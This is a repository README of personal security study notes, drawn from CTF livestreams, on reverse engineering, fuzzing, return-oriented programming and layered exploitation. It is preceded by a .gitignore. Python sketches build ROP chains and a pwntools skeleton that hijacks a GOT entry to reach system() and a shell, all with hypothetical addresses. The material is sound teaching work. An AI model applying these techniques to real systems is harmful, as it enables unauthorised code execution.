├── .gitignore
└── README.md

/.gitignore:
--------------------------------------------------------------------------------

# Created by https://www.gitignore.io/api/vim,linux,emacs

### Emacs ###
# -*- mode: gitignore; -*-
*~
\#*\#
/.emacs.desktop
/.emacs.desktop.lock
*.elc
auto-save-list
tramp
.\#*

# Org-mode
.org-id-locations
*_archive

# flymake-mode
*_flymake.*

# eshell files
/eshell/history
/eshell/lastdir

# elpa packages
/elpa/

# reftex files
*.rel

# AUCTeX auto folder
/auto/

# cask packages
.cask/
dist/

# Flycheck
flycheck_*.el

# server auth directory
/server/

# projectiles files
.projectile

# directory configuration
.dir-locals.el

### Linux ###

# temporary files which can be created if a process still has a handle open of a deleted file
.fuse_hidden*

# KDE directory preferences
.directory

# Linux trash folder which might appear on any partition or disk
.Trash-*

# .nfs files are created when an open file is removed but is still being accessed
.nfs*

### Vim ###
# swap
[._]*.s[a-v][a-z]
[._]*.sw[a-p]
[._]s[a-v][a-z]
[._]sw[a-p]
# session
Session.vim
# temporary
.netrwhist
# auto-generated tag files
tags

# End of https://www.gitignore.io/api/vim,linux,emacs
--------------------------------------------------------------------------------

/README.md:
--------------------------------------------------------------------------------
# Some security related notes

I have started to write down notes on the security-related videos I watch (as a way of quick recall).

These might be more useful to beginners.

The order of notes here is _not_ in order of difficulty, but in reverse chronological order of how I write them (i.e., latest first).

## License

[![CC BY-NC-SA 4.0](https://i.creativecommons.org/l/by-nc-sa/4.0/88x31.png)](http://creativecommons.org/licenses/by-nc-sa/4.0/)

This work is licensed under a [Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License](http://creativecommons.org/licenses/by-nc-sa/4.0/).

## The Notes Themselves

### Misc RE tips

Written on Aug 12 2017

> Influenced by Gynvael's CONFidence CTF 2017 Livestreams [here](https://www.youtube.com/watch?v=kZtHy9GqQ8o) and [here](https://www.youtube.com/watch?v=W7s5CWaw6I4); and by his Google CTF Quals 2017 Livestream [here](https://www.youtube.com/watch?v=KvyBn4Btv8E)

Sometimes, a challenge might implement a complicated task by implementing a VM. It is not always necessary to completely reverse engineer the VM in order to solve the challenge. Sometimes, you can RE a little bit, and once you know what is going on, you can hook into the VM and get access to the stuff that you need. Additionally, timing-based side-channel attacks become easier in VMs (mainly due to the larger number of _"real"_ instructions executed per VM instruction).

Cryptographically interesting functions in binaries can be recognized and quickly RE'd simply by looking for their constants and searching for them online. For standard crypto functions, these constants are sufficient to quickly identify the function. Simpler crypto functions can be recognized even more easily: if you see a lot of XORs and stuff like that happening, and no easily identifiable constants, it is probably hand-rolled crypto (and also possibly broken).
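To make the constant-spotting tip concrete, here is a minimal sketch of the idea in plain Python; the constants in the table are well-known values, and `challenge.bin` is a hypothetical target binary:

```python
import struct

# A few well-known constants that standard crypto code tends to contain.
KNOWN_CONSTANTS = {
    0x67452301: "MD5/SHA-1 initial state",
    0x6a09e667: "SHA-256 initial state",
    0x9e3779b9: "TEA/XTEA delta",
    0xedb88320: "CRC-32 polynomial (reflected)",
}

data = open("challenge.bin", "rb").read()  # hypothetical target

# Scan every 32-bit little-endian word at every byte offset.
for offset in range(len(data) - 3):
    (word,) = struct.unpack_from("<I", data, offset)
    if word in KNOWN_CONSTANTS:
        print(f"{offset:#010x}: {word:#010x} -> {KNOWN_CONSTANTS[word]}")
```

In practice, IDA's immediate-value search or plugins like FindCrypt do the same thing more thoroughly, but the idea is exactly this.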
Sometimes, when using IDA with Hex-Rays, the disassembly view might be better than the decompilation view. This is especially true if you notice that there seems to be a lot of complication going on in the decompilation view, but you notice repetitive patterns in the disassembly view. (You can quickly switch b/w the two using the space bar.) For example, if there is a (fixed size) big-integer library implemented, then the decompilation view is terrible, but the disassembly view is easy to understand (and easily recognizable due to the repetitive "with-carry" instructions such as `adc`). Additionally, when analyzing like this, using the "Group Nodes" feature in IDA's graph view is extremely useful to quickly reduce the complexity of your graph, as you understand what each node does.

For weird architectures, having a good emulator is extremely useful. Especially an emulator that can give you a dump of the memory: once you have the memory out of the emulator, it can be used to quickly figure out what is going on and to recognize interesting portions. Additionally, using an emulator implemented in a comfortable language (such as Python) means that you can run things exactly how you like. For example, if there is some interesting part of the code you might wish to run multiple times (say, to brute force something), then using the emulator, you can quickly code up something that runs only that part of the code, rather than having to run the complete program.

Being lazy is good when REing. Do NOT waste time reverse engineering everything, but spend enough time doing recon (even in an RE challenge!), so as to reduce the time spent on the more difficult task of actually REing. Recon, in such a situation, means just taking quick looks at different functions, without spending too much time analyzing each function thoroughly. You just quickly gauge what the function might be about (for example, "looks like a crypto thing", or "looks like a memory management thing", etc.)

For unknown hardware or architectures, spend enough time looking them up on Google; you might get lucky with a bunch of useful tools or documents that help you build tools quicker. Oftentimes, you'll find toy emulators or similar implementations that might be useful as a quick starting point. Alternatively, you might get some interesting info (such as how bitmaps are stored, or how strings are stored, or something) with which you can write a quick "fix" script, and then use normal tools to see if interesting stuff is there.

Gimp (the image manipulation tool) has a very cool open/load functionality to see raw pixel data. You can use this to quickly look for assets or repetitive structures in raw binary data. Do spend time messing around with the settings to see if more info can be gleaned from it.
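The same raw-pixel trick can also be scripted. A small sketch using Pillow, assuming the blob can be viewed as 8-bit grayscale; the width is the setting you would mess around with until structures line up, and `firmware.bin` is a placeholder:

```python
from PIL import Image  # Pillow

data = open("firmware.bin", "rb").read()  # placeholder blob

width = 512                    # a guess; re-run with different widths
height = len(data) // width

# Interpret the raw bytes as one grayscale pixel per byte.
img = Image.frombytes("L", (width, height), data[:width * height])
img.save("preview.png")
```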
### Analysis for RE and Pwning tasks in CTFs

Written on Jul 2 2017

> Influenced by a discussion with [@p4n74](https://github.com/p4n74/) and [@h3rcul35](https://github.com/aazimcr) on the [InfoSecIITR](https://github.com/InfoSecIITR/) #bin chat. We were discussing how sometimes beginners struggle to start with a larger challenge binary, especially when it is stripped.

Whether the goal is to solve an RE challenge or to pwn a binary, one must first analyze the given binary in order to exploit it effectively. Since the binary might be stripped etc. (found using `file`), one must know where to begin analysis, to get a foothold to build up from.

There are a few styles of analysis when looking for vulnerabilities in binaries (and from what I have gathered, different CTF teams have different preferences):

1. Static Analysis

1.1. Transpiling complete code to C

This kind of analysis is sort of rare, but is quite useful for smaller binaries. The idea is to go in and reverse engineer the entirety of the code. Each and every function is opened in IDA (using the decompiler view), and renaming (shortcut: n) and retyping (shortcut: y) are used to quickly make the decompiled code much more readable. Then, all the code is copied/exported into a separate .c file, which can be compiled to get an equivalent (but not identical) binary to the original. Then, source-code-level analysis can be done to find vulns etc. Once the point of vulnerability is found, the exploit is built on the original binary, by following along in the nicely decompiled source in IDA, side by side with the disassembly view (use Tab to quickly switch between the two; and use Space to switch quickly between Graph and Text view for disassembly).

1.2. Minimal analysis of decompilation

This is done quite often, since most of the binary is relatively useless (from the attacker's perspective). You only need to analyze the functions that are suspicious or might lead you to the vuln. To do this, there are some approaches to start off:

1.2.1. Start from main

Usually, for a stripped binary, even main is not labelled (IDA 6.9 onwards does mark it for you though), but over time, you learn to recognize how to reach main from the entry point (where IDA opens at by default). You jump to that and start analyzing from there.

1.2.2. Find relevant strings

Sometimes, you know some specific strings that might be output, that you know might be useful (for example "Congratulations, your flag is %s" for an RE challenge). You can jump to the Strings view (shortcut: Shift+F12), find the string, and work backwards using XRefs (shortcut: x). The XRefs let you find the path of functions to that string, by using XRefs on all functions in that chain, until you reach main (or some point that you know). A small IDAPython sketch of this workflow appears after this list.

1.2.3. From some random function

Sometimes, no specific string might be useful, and you don't want to start from main.
So instead, you quickly flip through the whole functions list, looking for functions that look suspicious (such as having lots of constants, or lots of xors, etc.) or that call important functions (XRefs of malloc, free, etc.), and you start off from there, going both forwards (following functions it calls) and backwards (XRefs of the function).

1.3. Pure disassembly analysis

Sometimes, you cannot use the decompilation view (because of a weird architecture, or anti-decompilation techniques, or hand-written assembly, or decompilation looking unnecessarily complex). In that case, it is perfectly valid to look purely at the disassembly view. It is extremely useful (for new architectures) to turn on Auto Comments, which shows a comment explaining each instruction. Additionally, the node colorization and group-nodes functionalities are immensely helpful. Even if you don't use any of these, regularly marking comments in the disassembly helps a lot. If I am personally doing this, I prefer writing down Python-like comments, so that I can then quickly transpile them manually into Python (especially useful for RE challenges, where you might have to use Z3 etc.).

1.4. Using platforms like BAP, etc.

This kind of analysis is (semi-)automated, and is usually more useful for much larger software; it is rarely directly used in CTFs.

2. Fuzzing

Fuzzing can be an effective technique to quickly get to the vuln, without having to actually understand it initially. By using a fuzzer, one can get a lot of low-hanging-fruit style vulns, which then need to be analyzed and triaged to get to the actual vuln. See my notes on [basics of fuzzing](https://github.com/jaybosamiya/security-notes#basics-of-fuzzing) and [genetic fuzzing](https://github.com/jaybosamiya/security-notes#genetic-fuzzing) for more info.

3. Dynamic Analysis

Dynamic analysis can be used after finding a vuln using static analysis, to help build exploits quickly. Alternatively, it can be used to find the vuln itself. Usually, one starts up the executable inside a debugger, and tries to go along code paths that trigger the bug. By placing breakpoints at the right locations, and analyzing the state of the registers/heap/stack/etc., one can get a good idea of what is going on. One can also use debuggers to quickly identify interesting functions. This can be done, for example, by setting temporary breakpoints on all functions initially, then proceeding to do 2 walks: one through all uninteresting code paths, and one through only a single interesting path. The first walk trips all the uninteresting functions and disables those breakpoints, thereby leaving the interesting ones showing up as breakpoints during the second walk.
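Here is the IDAPython sketch promised in 1.2.2: it finds strings containing a keyword and walks the XRefs to each, giving you the starting points for the backwards walk. The API names are from IDA 7.x as I recall them; adjust for other versions:

```python
# Run inside IDA's Python console.
import idautils
import idc

KEYWORD = "flag"  # whatever string you expect the binary to print

for s in idautils.Strings():
    if KEYWORD in str(s):
        print(f"string at {s.ea:#x}: {str(s)!r}")
        # Each xref is a candidate function to start analyzing from.
        for xref in idautils.XrefsTo(s.ea):
            print(f"  used by {idc.get_func_name(xref.frm)} at {xref.frm:#x}")
```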
My personal style of analysis is to start with static analysis, usually from main (or for non-console-based applications, from strings), and work towards quickly finding a function that looks odd. I then spend time and branch out forwards and backwards from there, regularly writing down comments, and continuously renaming and retyping variables to improve the decompilation. Like others, I do use names like Apple, Banana, Carrot, etc. for seemingly useful, but as-of-yet unknown functions/variables/etc., to make analysis easier (keeping track of func_123456-style names is too difficult for me). I also regularly use the Structures view in IDA to define structures (and enums) to make the decompilation even nicer. Once I find the vuln, I usually move to writing a script with pwntools (and use that to call a `gdb.attach()`). This way, I get a lot of control over what is going on. Inside gdb, I usually use plain gdb, though I have added a command `peda` that loads peda instantly if needed.

My style is definitely evolving though, as I have gotten more comfortable with my tools, and also with custom tools I have written to speed things up. I would be happy to hear of other analysis styles, as well as possible changes to my style that might help me get faster. For any comments/criticisms/praise you have, as always, I can be reached on Twitter [@jay\_f0xtr0t](http://twitter.com/@jay_f0xtr0t).

### Return Oriented Programming

Written on Jun 4 2017

> Influenced by [this](https://www.youtube.com/watch?v=iwRSFlZoSCM) awesome live stream by Gynvael Coldwind, where he discusses the basics of ROP, and gives a few tips and tricks

Return Oriented Programming (ROP) is one of the classic exploitation techniques, used to bypass the NX (non-executable memory) protection. Microsoft has incorporated NX as DEP (data execution prevention), and Linux etc. have it enabled as well, which means that with this protection, you can no longer place shellcode on the heap/stack and have it execute just by jumping to it. So now, to be able to execute code, you jump into pre-existing code (the main binary, or its libraries -- libc, ld.so, etc. on Linux; kernel32, ntdll, etc. on Windows). ROP works by re-using fragments of this code that is already there, and figuring out a way to combine those fragments into doing what you want to do (which is of course, HACK THE PLANET!!!).

Originally, ROP started with ret2libc, and then became more advanced over time by using many more small pieces of code. Some might say that ROP is now "dead", due to additional protections to mitigate it, but it still can be exploited in a lot of scenarios (and is definitely necessary for many CTFs).

The most important part of ROP is the gadgets. Gadgets are "usable pieces of code for ROP". That usually means pieces of code that end with a `ret` (but other kinds of gadgets might also be useful, such as those ending with `pop eax; jmp eax`, etc.). We chain these gadgets together to form the exploit; the chain is known as the _ROP chain_.

One of the most important assumptions of ROP is that you have control over the stack (i.e., the stack pointer points to a buffer that you control). If this is not true, then you will need to apply other tricks (such as stack pivoting) to gain this control before building a ROP chain.
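Concretely, a ROP chain is nothing more than a byte string of little-endian addresses and data placed where the stack pointer will land; each gadget's final `ret` pops the next address off the stack. A sketch with made-up 32-bit addresses (a gadget finder and/or a leak would provide the real ones):

```python
import struct

def p32(value):
    # one 32-bit little-endian word, exactly as it sits on the stack
    return struct.pack("<I", value)

# Hypothetical addresses for a 32-bit binary.
POP_ECX_RET = 0x08048abc   # pop ecx ; ret
NEXT_GADGET = 0x08048def   # runs next, because `ret` pops its address

payload  = b"A" * 76            # padding up to the saved return address
payload += p32(POP_ECX_RET)     # first gadget runs on function return
payload += p32(0xdeadbeef)      # the value that `pop ecx` consumes
payload += p32(NEXT_GADGET)     # the chain continues from here
```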
How do you extract gadgets? Use downloadable tools (such as [ropgadget](http://shell-storm.org/project/ROPgadget/)), or online tools (such as [ropshell](http://ropshell.com/)), or write your own tools (which might be more useful for difficult challenges sometimes, since you can tweak your tool to the specific challenge if need be). Basically, we just need the addresses that we can jump to for these gadgets. This is where there might be a problem with ASLR etc. (in which case, you get a leak of an address before moving on to actually doing ROP).

So now, how do we use these gadgets to make a ropchain? We first look for "basic gadgets". These are gadgets that can do _simple_ tasks for us (such as `pop ecx; ret`, which can be used to load a value into ecx by placing the gadget, followed by the value to be loaded, followed by the rest of the chain, which is returned to after the value is loaded). The most useful basic gadgets are usually "set a register", "store register value at address pointed to by register", etc.

We can build up from these primitive functions to gain higher-level functionality (similar to my post titled [exploitation abstraction](#exploitation-abstraction)). For example, using the set-register and store-value-at-address gadgets, we can come up with a "poke" function that lets us set any specific address to a specific value. Using this, we can build a "poke-string" function that lets us store any particular string at any particular location in memory. Now that we have poke-string, we are basically almost done, since we can create any structures that we want in memory, and can also call any functions we want with the parameters we want (since we can set-register, and can place values on the stack).
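A sketch of what those two abstractions might look like in Python, with hypothetical gadget addresses standing in for the output of a gadget finder:

```python
import struct

def p32(value):
    return struct.pack("<I", value)

# Hypothetical basic gadgets for a 32-bit target:
POP_EAX_RET     = 0x08048aaa  # pop eax ; ret         (set the "where")
POP_ECX_RET     = 0x08048bbb  # pop ecx ; ret         (set the "what")
MOV_PTR_EAX_ECX = 0x08048ccc  # mov [eax], ecx ; ret  (do the store)

def poke(addr, value):
    """Chain fragment that writes one 4-byte value to addr."""
    return (p32(POP_EAX_RET) + p32(addr) +
            p32(POP_ECX_RET) + p32(value) +
            p32(MOV_PTR_EAX_ECX))

def poke_string(addr, data):
    """Chain fragment that writes an arbitrary string to addr."""
    data += b"\x00" * (-len(data) % 4)   # pad to a 4-byte boundary
    chain = b""
    for i in range(0, len(data), 4):
        chain += poke(addr + i, struct.unpack_from("<I", data, i)[0])
    return chain

# e.g. plant "/bin/sh\0" at some hypothetical writable address:
chain = poke_string(0x0804a100, b"/bin/sh\x00")
```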
One of the most important reasons to build from these lower-order primitives to larger functions that do more complex things is to reduce the chance of making mistakes (which is common in ROP otherwise).

There are more complex ideas, techniques, and tips for ROP, but that is possibly a topic for a separate note, for a different time :)

PS: Gyn has a blogpost on [Return-Oriented Exploitation](http://gynvael.coldwind.pl/?id=149) that might be worth a read.

### Genetic Fuzzing

Written on May 27 2017; extended on May 29 2017

> Influenced by [this](https://www.youtube.com/watch?v=JhsHGms_7JQ) amazing live stream by Gynvael Coldwind, where he talks about the basic theory behind genetic fuzzing, and starts to build a basic genetic fuzzer. He then proceeds to complete the implementation in [this](https://www.youtube.com/watch?v=HN_tI601jNU) live stream.

This is "advanced" fuzzing (compared to the blind fuzzer described in my ["Basics of Fuzzing"](#basics-of-fuzzing) note): it also modifies/mutates bytes etc., but it does so a little bit smarter than the blind "dumb" fuzzer.

Why do we need a genetic fuzzer?

Some programs might be "nasty" towards dumb fuzzers, since it is possible that a vulnerability might require a whole bunch of conditions to be satisfied to be reached. With a dumb fuzzer, we have a very low probability of this happening, since it doesn't have any idea whether it is making any progress or not. As a specific example, if we have the code `if a: if b: if c: if d: crash!` (let's call it the CRASHER code), then we need 4 conditions to be satisfied to crash the program. However, a dumb fuzzer might be unable to get past the `a` condition, just because there is a very low chance that all 4 mutations `a`, `b`, `c`, `d` happen at the same time. In fact, even if it progresses by doing just `a`, the next mutation might go back to `!a`, just because it doesn't know anything about the program.

Wait, when does this kind of "bad case" program show up?

It is quite common in file format parsers, to take one example. To reach some specific code paths, one might need to get past multiple checks: "this value must be this, and that value must be that, and some other value must be something of something else", and so on. Additionally, almost no real-world software is "uncomplicated"; most software has many, many possible code paths, some of which can be accessed only after many things in the state get set up correctly. Thereby, many of these programs' code paths are basically inaccessible to dumb fuzzers. Additionally, some paths might be completely inaccessible (rather than just crazily improbable) because not enough mutations are ever done. If any of these paths have bugs, a dumb fuzzer would never be able to find them.

So how do we do better than dumb fuzzers?

Consider the Control Flow Graph (CFG) of the above-mentioned CRASHER code. If by chance a dumb fuzzer suddenly got `a` correct, it would not recognize that it reached a new node; it would continue ignoring this, discarding the sample. On the other hand, what AFL (and other genetic or "smart" fuzzers) do is recognize this as a new piece of information ("a newly reached path") and store this sample as a new initial point in the corpus. What this means is that now the fuzzer can start from the `a` block and move further. Of course, sometimes it might go back to `!a` from the `a` sample, but most of the time it will not, and instead it might be able to reach the `b` block. This again is a new node reached, so it adds a new sample to the corpus. This continues, allowing more and more possible paths to be checked, and finally reaches the `crash!`.

Why does this work?

By adding mutated samples into the corpus that explore the graph more (i.e., reach parts not explored before), we can reach previously unreachable areas, and can thus fuzz such areas. Since we can fuzz such areas, we might be able to uncover bugs in those regions.

Why is it called genetic fuzzing?

This kind of "smart" fuzzing is kind of like genetic algorithms. Mutation and crossover of specimens produce new specimens, and we keep the specimens that are better suited to the condition being tested; in this case, the condition is "how many nodes in the graph did it reach?", and the ones that traverse more can be kept. This is not exactly like genetic algos, but a variation (since we keep all specimens that traverse unexplored territory, and we don't do crossover); it is sufficiently similar to get the same name.
Basically: choice from a pre-existing population, followed by mutation, followed by fitness testing (whether it saw new areas), and repeat.

Wait, so we just keep track of unreached nodes?

Nope, not really. AFL keeps track of edge traversals in the graph, rather than nodes. Additionally, it doesn't just record "edge travelled or not"; it keeps track of how many times an edge was traversed. The hit count is bucketed roughly exponentially (1, 2, 4, 8, 16, ... times); an input whose count for some edge lands in a previously unseen bucket is considered a "new path" and leads to an addition to the corpus. This is done because looking at edges rather than nodes is a better way to distinguish between application states, and using exponentially increasing buckets of edge traversal counts gives more info (an edge traversed once is quite different from one traversed twice, but traversed 10 times is not too different from 11 times).

So, what all do you need in a genetic fuzzer?

We need 2 things. The first part is called the tracer (or tracing instrumentation). It basically tells you which instructions were executed in the application. AFL does this in a simple way by jumping in between the compilation stages. After the generation of the assembly, but before assembling the program, it looks for basic blocks (by looking for their endings, i.e., checking for jump/branch type instructions), and adds code to each block that marks the block/edge as executed (probably into some shadow memory or something). If we don't have source code, we can use other techniques for tracing (such as pin, a debugger, etc.). Turns out, even ASAN can give coverage information (see its docs for this).

For the second part, we then use the coverage information given by the tracer to keep track of new paths as they appear, and add those generated samples into the corpus for random selection in the future.

There are multiple mechanisms to build the tracer. They can be software based or hardware based. For hardware based, there are, for example, Intel CPU features where, given a buffer in memory, the CPU records information about all basic blocks traversed into that buffer. This requires kernel support, with the kernel exposing it as an API (which Linux does). For software based, we can do it by adding in code, or using a debugger (via temporary breakpoints, or through single stepping), or using address sanitizer's tracing abilities, or using hooks, or emulators, or a whole bunch of other ways.

Another way to differentiate the mechanisms is black-box tracing (where you can only use the unmodified binary) versus software white-box tracing (where you have access to the source code, and modify the code itself to add in tracing code).

AFL uses software instrumentation during compilation as the method for tracing (or, alternatively, QEMU emulation). Honggfuzz supports both software and hardware based tracing methods. Other smart fuzzers might differ. The one that Gyn builds uses the tracing/coverage provided by address sanitizer (ASAN).

Some fuzzers use "speedhacks" (i.e., tricks to increase fuzzing speed), such as a forkserver. Might be worth looking into these at some point :)
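To tie the section together, here is a toy sketch of that choose-mutate-trace-keep loop. The `toy_target` stands in for a real traced program: it is the CRASHER example from above, returning the set of "edges" an input reaches. In a real fuzzer, this information would come from one of the tracers described above:

```python
import random

def toy_target(data):
    """Stand-in for an instrumented target: the CRASHER example."""
    edges = set()
    if len(data) >= 4 and data[0:1] == b"a":
        edges.add("a")
        if data[1:2] == b"b":
            edges.add("b")
            if data[2:3] == b"c":
                edges.add("c")
                if data[3:4] == b"d":
                    raise RuntimeError("crash!")
    return edges

def mutate(data):
    data = bytearray(data)
    data[random.randrange(len(data))] = random.randrange(256)
    return bytes(data)

corpus = [b"xxxx"]   # initial sample
seen = set()

while True:
    sample = mutate(random.choice(corpus))   # choose + mutate
    try:
        edges = toy_target(sample)           # "trace" the run
    except RuntimeError:
        print("crashing input:", sample)
        break
    if edges - seen:                         # reached new territory?
        seen |= edges
        corpus.append(sample)                # keep the specimen
```

A dumb fuzzer is the same loop without the `if edges - seen` bookkeeping, which is exactly why it gets stuck at `a`.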
### Basics of Fuzzing

Written on 20th April 2017

> Influenced by [this](https://www.youtube.com/watch?v=BrDujogxYSk) awesome live stream by Gynvael Coldwind, where he talks about what fuzzing is about, and also builds a basic fuzzer from scratch!

What is a fuzzer, in the first place? And why do we use it?

Consider that we have a library/program that takes input data. The input may be structured in some way (say a PDF, or PNG, or XML, etc.; but it doesn't need to be any "standard" format). From a security perspective, it is interesting if there is a security boundary between the input and the process/library/program, and we can pass some "special input" which causes unintended behaviour beyond that boundary. A fuzzer is one way to find such inputs. It does this by "mutating" things in the input (thereby _possibly_ corrupting it), leading to either a normal execution (including safely handled errors) or a crash. Crashes can happen due to edge-case logic not being handled well.

A crash is the easiest error condition to detect, but there are others as well. For example, using ASAN (address sanitizer) etc. might lead to detecting more things, which might be security issues. A single-byte overflow of a buffer might not cause a crash on its own, but by using ASAN, we might be able to catch even this with a fuzzer.

Another possible use for a fuzzer: inputs generated by fuzzing one program can also be used on another library/program to see if there are differences. For example, some high-precision math library errors were noticed like this. This doesn't usually lead to security issues though, so we won't concentrate on it much.

How does a fuzzer work?

A fuzzer is basically a mutate-execute-repeat loop that explores the state space of the application to try to "randomly" find crashing states / security vulns. It does _not_ find an exploit, just a vuln. The main part of the fuzzer is the mutator itself. More on this later.

Outputs from a fuzzer?

In the fuzzer, a debugger is (sometimes) attached to the application to get some kind of a report from the crash, to be able to analyze it later as a security vuln vs. a benign (but possibly important) crash.

How do we determine which areas of programs are best to fuzz first?

When fuzzing, we usually want to concentrate on a single piece, or a small set of pieces, of the program. This is done mainly to reduce the amount of execution to be done. Usually, we concentrate on the parsing and processing only. Again, the security boundary matters a _lot_ in deciding which parts matter to us.

Types of fuzzers?

Input samples given to the fuzzer are called the _corpus_. Oldschool fuzzers (aka "blind"/"dumb" fuzzers) needed a large corpus. Newer ones (aka "genetic" fuzzers, for example AFL) do not necessarily need such a large corpus, since they explore the state on their own.

How are fuzzers useful?

Fuzzers are mainly useful for "low hanging fruit". They won't find complicated logic bugs, but they can find easy-to-find bugs (which are actually sometimes easy to miss during manual analysis). While I might say _input_ throughout this note, and usually refer to an _input file_, it need not be just that. Fuzzers can handle inputs that might be stdin or input files or network sockets or many others. Without too much loss of generality though, we can think of it as just a file for now.

How to write a (basic) fuzzer?

Again, it just needs to be a mutate-run-repeat loop. We need to be able to call the target often (`subprocess.Popen`). We also need to be able to pass input into the program (e.g., files) and detect crashes (a `SIGSEGV` etc. in the target can be detected from its exit status). Now, we just have to write a mutator for the input file, and keep calling the target on the mutated files.
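A minimal sketch of such a blind fuzzer; `./target` (a program that parses the file given as its first argument) and `sample.png` are placeholders:

```python
import random
import subprocess

SEED = open("sample.png", "rb").read()   # any valid input file

def mutate(data):
    data = bytearray(data)
    for _ in range(max(1, len(data) // 100)):   # mangle ~1% of the bytes
        data[random.randrange(len(data))] = random.randrange(256)
    return bytes(data)

case = 0
while True:
    case += 1
    mutated = mutate(SEED)
    with open("input.bin", "wb") as f:
        f.write(mutated)
    rc = subprocess.call(["./target", "input.bin"],
                         stdout=subprocess.DEVNULL,
                         stderr=subprocess.DEVNULL)
    if rc < 0:  # the child died to a signal (e.g. -11 is SIGSEGV)
        print(f"signal {-rc} on case {case}, keeping the sample")
        with open(f"crash_{case}.bin", "wb") as f:
            f.write(mutated)
```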
Mutators? What?!?

There can be multiple possible mutators. Easy (i.e., simple to implement) ones might mutate bits, mutate bytes, or mutate to "magic" values. To increase the chance of a crash, instead of changing only 1 bit or so, we can change multiple (maybe some parameterized percentage of them?). We can also (instead of random mutations) change bytes/words/dwords/etc. to some "magic" values. The magic values might be `0`, `0xff`, `0xffff`, `0xffffffff`, `0x80000000` (32-bit `INT_MIN`), `0x7fffffff` (32-bit `INT_MAX`), etc. Basically, pick ones that commonly cause security issues (because they might trigger some edge cases). We can write smarter mutators if we know more about the program (for example, for string-based integers, we might write something that changes an integer string to `"65536"` or `"-1"` etc.). Chunk-based mutators might move pieces around (basically, reorganizing input). Additive/appending mutators also work (for example, causing larger input into a buffer). Truncators also might work (for example, sometimes EOF might not be handled well). Basically, try a whole bunch of creative ways of mangling things. The more experience with the program (and exploitation in general), the more useful mutators might be possible.
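A few of those mutators sketched out; each takes and returns `bytes`, and for simplicity assumes an input at least a handful of bytes long:

```python
import random
import struct

MAGIC_DWORDS = [0, 0xff, 0xffff, 0xffffffff, 0x7fffffff, 0x80000000]

def mutate_magic(data):
    """Overwrite a random dword with a boundary-condition value."""
    data = bytearray(data)
    struct.pack_into("<I", data, random.randrange(len(data) - 3),
                     random.choice(MAGIC_DWORDS))
    return bytes(data)

def mutate_chunk(data):
    """Copy a random chunk over another spot (reorganize the input)."""
    data = bytearray(data)
    size = random.randrange(1, max(2, len(data) // 4))
    src = random.randrange(len(data) - size + 1)
    dst = random.randrange(len(data) - size + 1)
    data[dst:dst + size] = data[src:src + size]
    return bytes(data)

def mutate_truncate(data):
    """Chop the input short (EOF handling is often sloppy)."""
    return bytes(data[:random.randrange(1, len(data) + 1)])
```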
But what is this "genetic" fuzzing?

That is probably a discussion for a later time. However, a couple of links to some modern (open source) fuzzers are [AFL](http://lcamtuf.coredump.cx/afl/) and [honggfuzz](https://github.com/google/honggfuzz).

### Exploitation Abstraction

Written on 7th April 2017

> Influenced by a nice challenge in [PicoCTF 2017](http://2017.picoctf.com/) (name of challenge withheld, since the contest is still under way)

WARNING: This note might seem simple/obvious to some readers, but it needs saying, since the layering wasn't crystal clear to me until very recently.

Of course, when programming, all of us use abstractions, whether they be classes and objects, or functions, or meta-functions, or polymorphism, or monads, or functors, or all that jazz. However, can we really have such a thing during exploitation? Obviously, we can exploit mistakes made in implementing the aforementioned abstractions, but here, I am talking about something different.

Across multiple CTFs, whenever I had written an exploit previously, it was an ad-hoc exploit script that drops a shell. I use the amazing pwntools as a framework (for connecting to the service, converting things, DynELF, etc.), but that's about it. Each exploit tended to be an ad-hoc way to work towards the goal of arbitrary code execution. However, this challenge, as well as thinking about my previous note on ["Advanced" Format String Exploitation](#advanced-format-string-exploitation), made me realize that I could layer my exploits in a consistent way, and move through different abstraction layers to finally reach the requisite goal.

As an example, let us consider the vulnerability to be a logic error, which lets us do a read/write of 4 bytes, somewhere in a small range _after_ a buffer. We want to abuse this all the way to gaining code execution, and finally the flag.

In this scenario, I would consider this to be a `short-distance-write-anything` primitive. With this by itself, obviously we cannot do much. Nevertheless, I make a small Python function `vuln(offset, val)`. However, since just after the buffer there may be some data/metadata that might be useful, we can abuse this to build both `read-anywhere` and `write-anything-anywhere` primitives. This means I write short Python functions that call the previously defined `vuln()` function. These `get_mem(addr)` and `set_mem(addr, val)` functions are made (in this current example) simply by using the `vuln()` function to overwrite a pointer, which is then dereferenced elsewhere in the binary.

Now, after we have these `get_mem()` and `set_mem()` abstractions, I build an anti-ASLR abstraction, by basically leaking 2 addresses from the GOT through `get_mem()` and comparing against a [libc database](https://github.com/niklasb/libc-database) (thanks @niklasb for making the database). The offsets from these give me a `libc_base` reliably, which allows me to replace any function in the GOT with another from libc.

This has essentially given me control over EIP (the moment I can "trigger" one of those functions _exactly_ when I want to). Now, all that remains is for me to call the trigger with the right parameters. So I set up the parameters as a separate abstraction, and then call `trigger()`, and I have shell access on the system.

TL;DR: One can build small exploitation primitives (which do not have too much power), and by combining them and building a hierarchy of stronger primitives, we can gain complete execution.
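In script form, the layering for the example above might look like the following skeleton (pwntools-style; every address, offset, and protocol detail here is hypothetical and only illustrates the shape of the hierarchy):

```python
from pwn import *  # pwntools

elf = ELF("./challenge")       # hypothetical target binary
io = process(elf.path)

PTR_OFFSET = 16                # hypothetical: offset of a reusable pointer
LIBC_PUTS = 0x6f690            # hypothetical offsets from the libc database
LIBC_SYSTEM = 0x45390

def vuln(offset, value):
    """Layer 0: the logic bug -- a short-distance write after the buffer."""
    io.sendline(b"write %d %d" % (offset, value))  # hypothetical protocol

def set_mem(addr, value):
    """Layer 1: write-anything-anywhere, built on vuln() by corrupting
    a pointer that the program later writes through."""
    vuln(PTR_OFFSET, addr)
    vuln(PTR_OFFSET + 4, value)

def get_mem(addr):
    """Layer 1: read-anywhere, via a path that prints through the pointer."""
    vuln(PTR_OFFSET, addr)
    io.sendline(b"show")
    return int(io.recvline(), 16)

# Layer 2: defeat ASLR -- leak a GOT entry and recover libc_base.
libc_base = get_mem(elf.got["puts"]) - LIBC_PUTS

# Layer 3: hijack EIP -- point a GOT entry at system(), then trigger.
set_mem(elf.got["exit"], libc_base + LIBC_SYSTEM)
```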
### "Advanced" Format String Exploitation

Written on 6th April 2017

> Influenced by [this](https://www.youtube.com/watch?v=xAdjDEwENCQ) awesome live stream by Gynvael Coldwind, where he talks about format string exploitation

Simple format string exploits:

